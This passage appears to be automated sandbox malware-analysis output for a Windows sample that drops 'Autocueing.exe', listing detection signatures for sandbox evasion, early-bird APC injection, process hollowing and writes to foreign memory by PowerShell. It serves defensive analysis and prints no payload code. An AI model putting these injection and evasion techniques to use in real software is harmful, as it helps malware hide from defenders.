      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeAPI/Special instruction interceptor: Address: 1B65113
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6150Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3502Jump to behavior
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exe TID: 3816Thread sleep count: 34 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exe TID: 3816Thread sleep time: -340000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2516453019.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: Autocueing.exe, 00000008.00000003.2660749817.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646551568.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635296609.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029327539.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Autocueing.exe, 00000008.00000003.2660749817.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646551568.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635296609.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029327539.000000000344D000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000344D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeAPI call chain: ExitProcess graph end nodegraph_0-3285
      Source: C:\Users\user\Desktop\av8XPPpdBc.exeAPI call chain: ExitProcess graph end nodegraph_0-3437
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Autocueing.exeJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Autocueing.exe base address: 400000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Autocueing.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Autocueing.exe "C:\Users\user\AppData\Local\Temp\Autocueing.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
